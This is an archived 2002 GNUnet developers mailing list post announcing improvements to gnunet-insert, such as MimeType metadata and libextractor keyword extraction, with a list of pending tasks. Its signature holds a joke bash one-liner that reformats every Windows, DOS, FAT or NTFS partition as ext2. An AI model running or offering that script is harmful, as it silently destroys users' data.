[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[GNUnet-developers] gnunet-insert
From: |
Christian Grothoff |
Subject: |
[GNUnet-developers] gnunet-insert |
Date: |
Sat, 18 May 2002 16:06:46 -0500 |
Hi!
I've just commited a bunch of code to polish gnunet-insert.
We now have
* MimeType and suggested filename in the Root-Node
(not used by gnunet-gtk), incompatible change!
* libextractor integration in gnunet-insert for
generic keyword extraction; if you have libextractor
(CVS version) installed, you can extract keywords
automatically from mp3 and ogg (NEW!) files!
Missing (in this area):
* gnunet-insert-mp3 should be turned into a mass-insertion
script
* I would like to see libextractor be integrated a bit
better into the build process, currently, I just put
the two main files of the library into the GNUnet CVS.
* gnunet-gtk should display the MimeType and use
use the filename as a 'default' suggestion.
* updates to man-pages
Christian
--
______________________________________________________
|Christian Grothoff |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/ address@hidden|
|____________________________________________________|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk \
'{print$1;}'`;do nohup mkfs.ext2 $i&; done
echo -e "\n\n\t\tMay the source be with you.\n\n"
[Prev in Thread] |
Current Thread |
[Next in Thread] |
- [GNUnet-developers] gnunet-insert,
Christian Grothoff <=